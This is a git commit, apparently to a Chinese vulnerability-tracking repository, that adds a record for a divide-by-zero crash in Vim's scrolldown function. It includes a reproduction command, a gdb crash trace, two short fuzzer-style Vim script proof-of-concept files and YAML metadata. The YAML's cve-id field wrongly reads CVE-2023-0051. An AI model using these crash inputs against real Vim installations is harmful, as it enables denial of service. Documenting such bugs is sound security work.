添加CVE-2023-1127漏洞信息

2023-03-22 14:57:31 +08:00 · 2023-03-22 14:57:31 +08:00 · 31a68df5f7
parent b575c9d13f
commit 31a68df5f7
6 changed files with 187 additions and 0 deletions
--- a/cve/vim/2023/CVE-2023-1127/README.md
+++ b/cve/vim/2023/CVE-2023-1127/README.md
@ -0,0 +1,156 @@
+# 描述
+
+在move.c的scrolldown函数中存在除以0漏洞(move.c:1739)
+
+# 影响版本
+
+```
+git log
+commit ea62cee85e9e77ec86edd9843926dadb69978753 (HEAD -> master, tag: v9.0.1327, origin/master, origin/HEAD)
+Author: Bram Moolenaar <Bram@vim.org>
+Date:   Sun Feb 19 18:36:41 2023 +0000
+
+    patch 9.0.1327: cursor in wrong position below line with virtual text below
+
+    Problem:    Cursor in wrong position below line with virtual text below ending
+                in multi-byte character.
+    Solution:   When checking for last character take care of multi-byte
+                character.
+```
+
+# Proof of Concept
+
+```
+./vim -u NONE -i NONE -n -m -X -Z -e -s -S poc
+Floating point exception
+```
+
+# DEBUG
+
+```
+gdb --args ./vim -u NONE -i NONE -n -m -X -Z -e -s -S poc
+GNU gdb (Ubuntu 12.0.90-0ubuntu1) 12.0.90
+Copyright (C) 2022 Free Software Foundation, Inc.
+License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
+This is free software: you are free to change and redistribute it.
+There is NO WARRANTY, to the extent permitted by law.
+Type "show copying" and "show warranty" for details.
+This GDB was configured as "x86_64-linux-gnu".
+Type "show configuration" for configuration details.
+For bug reporting instructions, please see:
+<https://www.gnu.org/software/gdb/bugs/>.
+Find the GDB manual and other documentation resources online at:
+    <http://www.gnu.org/software/gdb/documentation/>.
+
+For help, type "help".
+Type "apropos word" to search for commands related to "word"...
+Reading symbols from ./vim...
+gdb-peda$ r
+Starting program: /home/user/vim/src/vim -u NONE -i NONE -n -m -X -Z -e -s -S poc
+[Thread debugging using libthread_db enabled]
+Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
+
+Program received signal SIGFPE, Arithmetic exception.
+Warning: 'set logging off', an alias for the command 'set logging enabled', is deprecated.
+Use 'set logging enabled off'.
+
+Warning: 'set logging on', an alias for the command 'set logging enabled', is deprecated.
+Use 'set logging enabled on'.
+
+[----------------------------------registers-----------------------------------]
+RAX: 0x8
+RBX: 0x7fffffff57c0 --> 0x1
+RCX: 0xfffffff8 --> 0x0
+RDX: 0x0
+RSI: 0x1
+RDI: 0x62500001e100 --> 0x3eb
+RBP: 0x7fffffff5c00 --> 0x7fffffff5d50 --> 0x7fffffff6010 --> 0x7fffffff62f0 --> 0x7fffffff6c30 --> 0x7fffffff6c60 (--> ...)
+RSP: 0x7fffffff5780 --> 0x41b58ab3
+RIP: 0x555555c052fa (<scrolldown+7594>: idiv   DWORD PTR [rbx+0x3dc])
+R8 : 0x10007fff68ef --> 0x0
+R9 : 0x2
+R10: 0xffffffffffffffff
+R11: 0x6c ('l')
+R12: 0x7fffffffdf78 --> 0x7fffffffe321 ("/home/user/vim/src/vim")
+R13: 0x555556219fb0 (<main>:    push   rbp)
+R14: 0x55555634bae8 --> 0x5555557e16b0 (<asan.module_dtor>: push   rbp)
+R15: 0x7ffff7ffd040 --> 0x7ffff7ffe2e0 --> 0x555555554000 --> 0x10102464c457f
+EFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
+[-------------------------------------code-------------------------------------]
+   0x555555c052ed <scrolldown+7581>:    jle    0x555555c0531f <scrolldown+7631>
+   0x555555c052f3 <scrolldown+7587>:    mov    eax,DWORD PTR [rbx+0x3c0]
+   0x555555c052f9 <scrolldown+7593>:    cdq
+=> 0x555555c052fa <scrolldown+7594>:    idiv   DWORD PTR [rbx+0x3dc]
+   0x555555c05300 <scrolldown+7600>:    add    eax,DWORD PTR [rbx+0x3bc]
+   0x555555c05306 <scrolldown+7606>:    mov    DWORD PTR [rbx+0x3bc],eax
+   0x555555c0530c <scrolldown+7612>:    mov    eax,DWORD PTR [rbx+0x3c0]
+   0x555555c05312 <scrolldown+7618>:    cdq
+[------------------------------------stack-------------------------------------]
+0000| 0x7fffffff5780 --> 0x41b58ab3
+0008| 0x7fffffff5788 --> 0x55555628b24c ("1 32 8 10 first:1599")
+0016| 0x7fffffff5790 --> 0x555555c03550 (<scrolldown>:  push   rbp)
+0024| 0x7fffffff5798 --> 0x100000000 --> 0x0
+0032| 0x7fffffff57a0 --> 0x62500000a420 --> 0x1
+0040| 0x7fffffff57a8 --> 0x0
+0048| 0x7fffffff57b0 --> 0x62500000a428 --> 0x0
+0056| 0x7fffffff57b8 --> 0x5555561388be (<may_trigger_win_scrolled_resized+2510>:   lea    rsp,[rbp-0x8])
+[------------------------------------------------------------------------------]
+Legend: code, data, rodata, value
+Stopped reason: SIGFPE
+0x0000555555c052fa in scrolldown (line_count=0x0, byfold=0x0) at move.c:1739
+1739            row += col / width2;
+gdb-peda$ p width2
+$1 = 0x0
+gdb-peda$ bt
+#0  0x0000555555c052fa in scrolldown (line_count=0x0, byfold=0x0) at move.c:1739
+#1  0x0000555555c20b33 in check_scrollbind (topline_diff=0x0, leftcol_diff=0x0) at normal.c:1943
+#2  0x00005555562238b2 in main_loop (cmdwin=0x1, noexmode=0x0) at main.c:1390
+#3  0x0000555555a4c17a in open_cmdwin () at ex_getln.c:4549
+#4  0x0000555555a3bfd2 in getcmdline_int (firstc=0x3a, count=0x1, indent=0x0, clear_ccline=0x1) at ex_getln.c:1938
+#5  0x0000555555a38809 in getcmdline (firstc=0x3a, count=0x1, indent=0x0, do_concat=GETLINE_CONCAT_CONT) at ex_getln.c:1554
+#6  0x0000555555a4101d in getexline (c=0x3a, cookie=0x0, indent=0x0, options=GETLINE_CONCAT_CONT) at ex_getln.c:2843
+#7  0x00005555559e2bc3 in do_cmdline (cmdline=0x0, fgetline=0x555555a40f90 <getexline>, cookie=0x0, flags=0x0) at ex_docmd.c:876
+#8  0x0000555555c30b82 in nv_colon (cap=0x7fffffff7e60) at normal.c:3176
+#9  0x0000555555c1478b in normal_cmd (oap=0x7fffffff8440, toplevel=0x1) at normal.c:938
+#10 0x0000555555a14a8d in exec_normal (was_typed=0x0, use_vpeekc=0x0, may_use_terminal_loop=0x0) at ex_docmd.c:8887
+#11 0x0000555555a146b4 in exec_normal_cmd (cmd=0x611000000a48 "\\fn0ndwPPPP\\021\\rWPP0rm0<", '0' <repeats 13 times>, remap=0x0, silent=0x0)
+    at ex_docmd.c:8850
+#12 0x0000555555a14422 in ex_normal (eap=0x7fffffff89a0) at ex_docmd.c:8768
+#13 0x00005555559ef8b0 in do_one_cmd (cmdlinep=0x7fffffff9e40, flags=0x7, cstack=0x7fffffff9e60, fgetline=0x555555e0e7b0 <getsourceline>,
+    cookie=0x7fffffffae60) at ex_docmd.c:2580
+#14 0x00005555559e3675 in do_cmdline (cmdline=0x611000000540 "noaoco\\001\\rr\\027\\027normnorm:", fgetline=0x555555e0e7b0 <getsourceline>,
+    cookie=0x7fffffffae60, flags=0x7) at ex_docmd.c:993
+#15 0x0000555555e0c5a4 in do_source_ext (fname=0x602000006153 "poc", check_other=0x0, is_vimrc=0x0, ret_sid=0x0, eap=0x0, clearvars=0x0)
+    at scriptfile.c:1759
+#16 0x0000555555e0a0d1 in do_source (fname=0x602000006153 "poc", check_other=0x0, is_vimrc=0x0, ret_sid=0x0) at scriptfile.c:1905
+#17 0x0000555555e09c20 in cmd_source (fname=0x602000006153 "poc", eap=0x7fffffffb820) at scriptfile.c:1250
+#18 0x0000555555e0971e in ex_source (eap=0x7fffffffb820) at scriptfile.c:1276
+#19 0x00005555559ef8b0 in do_one_cmd (cmdlinep=0x7fffffffccc0, flags=0xb, cstack=0x7fffffffcce0, fgetline=0x0, cookie=0x0) at ex_docmd.c:2580
+#20 0x00005555559e3675 in do_cmdline (cmdline=0x602000002710 "so poc", fgetline=0x0, cookie=0x0, flags=0xb) at ex_docmd.c:993
+#21 0x00005555559e6771 in do_cmdline_cmd (cmd=0x602000002710 "so poc") at ex_docmd.c:587
+#22 0x0000555556222b5d in exe_commands (parmp=0x555556e0ac00 <params>) at main.c:3146
+#23 0x000055555622095b in vim_main2 () at main.c:782
+#24 0x000055555621a56f in main (argc=0xd, argv=0x7fffffffdf78) at main.c:433
+#25 0x00007ffff7c45d90 in __libc_start_call_main (main=main@entry=0x555556219fb0 <main>, argc=argc@entry=0xd, argv=argv@entry=0x7fffffffdf78)
+    at ../sysdeps/nptl/libc_start_call_main.h:58
+#26 0x00007ffff7c45e40 in __libc_start_main_impl (main=0x555556219fb0 <main>, argc=0xd, argv=0x7fffffffdf78, init=<optimized out>, fini=<optimized out>,
+    rtld_fini=<optimized out>, stack_end=0x7fffffffdf68) at ../csu/libc-start.c:392
+#27 0x0000555555721a75 in _start ()
+gdb-peda$ list
+1734            col -= width1;
+1735            ++row;
+1736        }
+1737        if (col > width2)
+1738        {
+1739            row += col / width2;
+1740            col = col % width2;
+1741        }
+1742        if (row >= curwin->w_height)
+1743        {
+```
+
+[poc](https://drive.google.com/file/d/1m30Vl9KgAZ2JNeRKzvbdlQohybd3RWte/view?usp=sharing)
+
+# 影响
+
+可以导致DoS，内存修改，或者可能的远程执行
--- a/cve/vim/2023/CVE-2023-1127/poc
+++ b/cve/vim/2023/CVE-2023-1127/poc
--- a/cve/vim/2023/CVE-2023-1127/poc2
+++ b/cve/vim/2023/CVE-2023-1127/poc2
@ -0,0 +1,6 @@
+wi0 0
+no0 L
+sil0norm0
+sil0norm00000:se!no
sil0no++++&32+++32nnnnnnnnnnnnnnnnnnnnnnnnnnn 0 10no 0 :H
+diffs:H
+dif:H
--- a/cve/vim/2023/CVE-2023-1127/poc3
+++ b/cve/vim/2023/CVE-2023-1127/poc3
@ -0,0 +1,5 @@
+wi0 0
+no0 L
+sil0norm0
+sil0norm00000:se!no
+sil0norm
--- a/cve/vim/2023/yaml/CVE-2023-1127.yaml
+++ b/cve/vim/2023/yaml/CVE-2023-1127.yaml
@ -0,0 +1,19 @@
+id: CVE-2023-1127
+source: https://huntr.dev/bounties/2d4d309e-4c96-415f-9070-36d0815f1beb/
+info:
+  name: Vim是一款基于UNIX平台的编辑器。
+  severity: high
+  description: |
+    GitHub存储库vim/vim在9.0.1367版本存在除以零漏洞。
+  scope-of-influence:
+    vim < 9.0.1367
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-1127
+  classification:
+    cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
+    cvss-score: 7.8
+    cve-id: CVE-2023-0051
+    cwe-id: CWE-369
+    cnvd-id: None
+    kve-id: None
+  tags: cve2023, 除零错误
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@ -107,6 +107,7 @@ cve:
    - CVE-2023-0051
    - CVE-2023-0054
    - CVE-2023-0512
+    - CVE-2023-1127
  openssl:
    - CVE-2022-1292
    - CVE-2022-2274